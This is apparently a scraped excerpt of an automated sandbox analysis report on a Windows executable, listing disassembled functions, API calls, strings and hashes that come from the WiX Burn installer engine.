                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?), ref: 008FB729
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FB737
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008FB75B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorFileLastSleep
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent logging pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 408151869-3151869001
                                                                                                                                                                                                                                                                            • Opcode ID: 2dbcfb73ca6e85af31c84861a895a742f03ab8ceeb5a5c1f99cba942428cf226
                                                                                                                                                                                                                                                                            • Instruction ID: c7ee473845070406c8822cfdfe9bc870320b63b6456596df8ba9535a19e45703
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dbcfb73ca6e85af31c84861a895a742f03ab8ceeb5a5c1f99cba942428cf226
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39710976E80729B7EB2196B5CC0AFBA6958FF45B65F210220FF10FB1D0E3A49D0096D5
                                                                                                                                                                                                                                                                            Function 00919A95 Relevance: 38.8, APIs: 3, Strings: 19, Instructions: 304COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00919AD9
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00919DF5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00919E04
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get cached path for package: %ls, xrefs: 00919BD0
                                                                                                                                                                                                                                                                            • Failed to allocate WUSA.exe path., xrefs: 00919B7B
                                                                                                                                                                                                                                                                            • Failed to build MSU path., xrefs: 00919C20
                                                                                                                                                                                                                                                                            • /log:, xrefs: 00919C7A
                                                                                                                                                                                                                                                                            • Failed to run MSU process, xrefs: 00919D47
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\msuengine.cpp, xrefs: 00919AFD, 00919BE2, 00919D59
                                                                                                                                                                                                                                                                            • Failed to find System32 directory., xrefs: 00919B50
                                                                                                                                                                                                                                                                            • Failed to ensure WU service was enabled to install MSU package., xrefs: 00919D10
                                                                                                                                                                                                                                                                            • Failed to determine WOW64 status., xrefs: 00919AEB
                                                                                                                                                                                                                                                                            • Failed to format MSU install command., xrefs: 00919C54
                                                                                                                                                                                                                                                                            • Failed to append SysNative directory., xrefs: 00919B31
                                                                                                                                                                                                                                                                            • wusa.exe, xrefs: 00919B68
                                                                                                                                                                                                                                                                            • Failed to append log switch to MSU command-line., xrefs: 00919C8E
                                                                                                                                                                                                                                                                            • "%ls" "%ls" /quiet /norestart, xrefs: 00919C40
                                                                                                                                                                                                                                                                            • Failed to append log path to MSU command-line., xrefs: 00919CBA
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00919DF5, 00919E04
                                                                                                                                                                                                                                                                            • SysNative\, xrefs: 00919B21
                                                                                                                                                                                                                                                                            • Failed to get action arguments for MSU package., xrefs: 00919B9B
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00919BFB, 00919E1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wusa.exe$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1400713077-558372864
                                                                                                                                                                                                                                                                            • Opcode ID: 110914fd00f695821a569828994e967f34334c4cdf43a55c388e6961e97086c4
                                                                                                                                                                                                                                                                            • Instruction ID: 3e6758d51c9b4114092fc664965509a7ec3becb3a389431952926573c2821ce1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 110914fd00f695821a569828994e967f34334c4cdf43a55c388e6961e97086c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AA19171F8021DBBEF129A94DC5AFEE7A78AF05714F100161FA00BA2E0D7B19D90DB91
                                                                                                                                                                                                                                                                            Function 00926421 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 295COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00945CB8: UuidCreate.RPCRT4(?), ref: 00945CDB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009267B4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009267CD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateUuid
                                                                                                                                                                                                                                                                            • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 264999607-3434836419
                                                                                                                                                                                                                                                                            • Opcode ID: 3990e57fde25a5d5a7abfc89227f7242742fa303ff0cf62415bbfc3798b57f3e
                                                                                                                                                                                                                                                                            • Instruction ID: 549d5c9ee1d8f8e55d2edcbf402db57addd196c0280c553acaa7813528b83eef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3990e57fde25a5d5a7abfc89227f7242742fa303ff0cf62415bbfc3798b57f3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABA19E31E40338ABDB21DBA4DC4AF9EBBB8AB45714F114165F908FB295E7709D84CB90
                                                                                                                                                                                                                                                                            Function 0091180C Relevance: 37.0, APIs: 4, Strings: 17, Instructions: 261COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-738192170
                                                                                                                                                                                                                                                                            • Opcode ID: e3e790d95cd3c73deaee04fc499b4ee250384c8feb318ac99538ff0514edf1c6
                                                                                                                                                                                                                                                                            • Instruction ID: 6a64dc8c2fce2480381e83614494388909970efa5fb3b6b6a650faf683ff4212
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3e790d95cd3c73deaee04fc499b4ee250384c8feb318ac99538ff0514edf1c6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B919D34B84609BBDB11DF448C46FAE7B76EF85B24F214154F725BB2D0DAB09980DA11
                                                                                                                                                                                                                                                                            Function 008EC989 Relevance: 35.5, APIs: 7, Strings: 13, Instructions: 496COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 008EC9C4
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 008ECBEA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringType
                                                                                                                                                                                                                                                                            • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$H$NOT$Symbol was too long: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4177115715-673032140
                                                                                                                                                                                                                                                                            • Opcode ID: f0fe875a0ea42591a36404d426da82f1b9e0e3b94f062864193e4b653eced3b4
                                                                                                                                                                                                                                                                            • Instruction ID: c01aadf19d6ba793174ded6f6e049820373ce766ea03741b36ec4ada8829241d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0fe875a0ea42591a36404d426da82f1b9e0e3b94f062864193e4b653eced3b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E02EFB1A40285BADB25CF56CC8AFBA7B65FB07704F208156F904DE181D7F1DA82D790
                                                                                                                                                                                                                                                                            Function 008F7A4E Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 213registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7CDA
                                                                                                                                                                                                                                                                              • Part of subcall function 0093D789: RegSetValueExW.ADVAPI32(?,008F7A20,008E6CF2,EstimatedSize,000000FF,008E6CF2,00000000,?,008F9AF0,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000), ref: 0093D7AD
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7C1F
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(009031C1,BundleResumeCommandLine,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7C6F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Delete$Close
                                                                                                                                                                                                                                                                            • String ID: "%ls" /%ls /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to open run key.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.clean.room$burn.runonce$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1871269255-1559682262
                                                                                                                                                                                                                                                                            • Opcode ID: 65938a85dcd3b0b95c15beb296cfda095980001002de898af26f397d90c789c8
                                                                                                                                                                                                                                                                            • Instruction ID: 01e4a08c9b699777326cc5d7e73844c15cc1cae5fd139f299d891dfb9c446d2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65938a85dcd3b0b95c15beb296cfda095980001002de898af26f397d90c789c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151297168972AB6FB219A759C4BFBF6918FB00B1AF110114FF01F61D1E6A09E0097E1
                                                                                                                                                                                                                                                                            Function 009204DF Relevance: 31.8, APIs: 2, Strings: 16, Instructions: 347threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(?,00000160,00000001,008E6CF2,00000000,000000FF,008E6DA2,00000000,000000B0,008E6CF2,008E6CF2,009030D0,00000160,?,008E6DA2), ref: 009205A1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009205AF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to execute EXE package., xrefs: 00920684
                                                                                                                                                                                                                                                                            • Failed to get cache thread exit code., xrefs: 009205DF
                                                                                                                                                                                                                                                                            • Cache thread exited unexpectedly with exit code: %u., xrefs: 00920866
                                                                                                                                                                                                                                                                            • Failed to execute BUNDLE package., xrefs: 0092064C
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\apply.cpp, xrefs: 009205D3, 009205D9, 009205ED, 00920850, 0092085B, 00920878, 009208C4
                                                                                                                                                                                                                                                                            • Failed to execute dependency action., xrefs: 00920791
                                                                                                                                                                                                                                                                            • Failed to execute begin MSI transaction action., xrefs: 009207C2
                                                                                                                                                                                                                                                                            • Invalid execute action., xrefs: 009208AB
                                                                                                                                                                                                                                                                            • Failed to execute uninstall MSI compatible package., xrefs: 00920897
                                                                                                                                                                                                                                                                            • Failed to execute MSU package., xrefs: 00920737
                                                                                                                                                                                                                                                                            • Failed to execute related bundle., xrefs: 00920614
                                                                                                                                                                                                                                                                            • Failed to execute commit MSI transaction action., xrefs: 009207EF
                                                                                                                                                                                                                                                                            • Failed to execute MSP package., xrefs: 009206F6
                                                                                                                                                                                                                                                                            • Failed to execute package provider registration action., xrefs: 00920764
                                                                                                                                                                                                                                                                            • Failed to wait for cache check-point., xrefs: 00920883
                                                                                                                                                                                                                                                                            • Failed to execute MSI package., xrefs: 009206BD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastThread
                                                                                                                                                                                                                                                                            • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1352145401-3642936599
                                                                                                                                                                                                                                                                            • Opcode ID: 5f465b7d9fd0ff98be8d5d589a39d77bc6d8ccfc2f3cb4498511d2a589fd0bd2
                                                                                                                                                                                                                                                                            • Instruction ID: 44cc9d9c09af0243ba13dd532685968ed6076fae7c475031879cc002144f3409
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f465b7d9fd0ff98be8d5d589a39d77bc6d8ccfc2f3cb4498511d2a589fd0bd2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CB19231A41269BBEF11CE54DC46FAF7B78EB85B54F110065BA04BB2C6E2B19D40CBE0
                                                                                                                                                                                                                                                                            Function 009491C4 Relevance: 31.8, APIs: 6, Strings: 12, Instructions: 254COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094943E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category label., xrefs: 0094925F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00949206, 00949402, 00949423
                                                                                                                                                                                                                                                                            • Failed to process all ATOM category elements., xrefs: 009493F3
                                                                                                                                                                                                                                                                            • Failed to process all ATOM category attributes., xrefs: 0094932D
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category scheme., xrefs: 009492A0
                                                                                                                                                                                                                                                                            • label, xrefs: 00949233
                                                                                                                                                                                                                                                                            • term, xrefs: 009492B6
                                                                                                                                                                                                                                                                            • scheme, xrefs: 00949275
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 009491F7
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM category element., xrefs: 00949372
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM category element: %ls, xrefs: 00949414
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category term., xrefs: 00949341
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-530868315
                                                                                                                                                                                                                                                                            • Opcode ID: 6055a5fb8a9f8b2981ecb219dac61370738d930b6dcfb5d9d66f5c117239c328
                                                                                                                                                                                                                                                                            • Instruction ID: 192b308de74cfa33c84fa8394f4825f3eb0bcca3c8ce63eb78c2f715b026a2ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6055a5fb8a9f8b2981ecb219dac61370738d930b6dcfb5d9d66f5c117239c328
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B81FF35A44218FBDF119F94CC4AFAF7779AB85B24F204158F625B72E0DB709A01DB50
                                                                                                                                                                                                                                                                            Function 008F9489 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 236COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: "%ls" /%ls /uninstall /quiet$Comments$Contact$Failed to delete %ls value.$Failed to write %ls value.$HelpLink$HelpTelephone$NoModify$NoRemove$ParentDisplayName$ParentKeyName$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$burn.clean.room$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3056233166
                                                                                                                                                                                                                                                                            • Opcode ID: 75b65626944ec8cc82e0c96ab1a084fd176fcf6bc364e11cecefba3918a0387e
                                                                                                                                                                                                                                                                            • Instruction ID: d53ba432939b5e123d29dc700792da3149ed168c2ce6e0d8800f45715ebf5e44
